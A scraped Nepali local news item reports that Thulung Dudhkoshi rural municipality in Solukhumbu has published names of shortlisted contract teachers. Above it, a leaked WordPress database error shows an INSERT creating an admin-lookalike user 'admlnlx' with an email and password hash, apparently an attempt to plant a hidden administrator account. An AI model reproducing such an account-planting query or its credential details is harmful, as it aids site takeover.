WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZzWIfBES8J6sVxCwh/H9JblVY6iz51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:56:11', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु, १८ मंसिर । थुलुङ दुधकोशी गाउँपालिका भित्र रहेका सामुदायीक विद्यालयमा रहेको रिक्त करार र राहत तथा गाउँपालिकको अनुदानमा रहने शिक्षकहरुको पद पूर्तिका लागि आज नाम सार्वजनिक गरेको छ ।
गाउँपालिकाले करार शिक्षक छनोट तथा सिफारिस सम्बन्धि २०७५ को नियम (७) बमोजिम २०७५ मंसिर ९ गते प्रकाशित सूचना बमोजिम सूचिकृत हुन रित पूर्वक आवेदन दिने शिक्षकहरु मध्ये तोकिएको न्यूतम योग्यता पुगेको आधरभूत तह प्रा.वि. र नि.मा.वि. तर्फ ६ जना माध्यमिक तह र आ.वि. तर्फ ७ जनाको नाम सार्वजनिक गरेको छ ।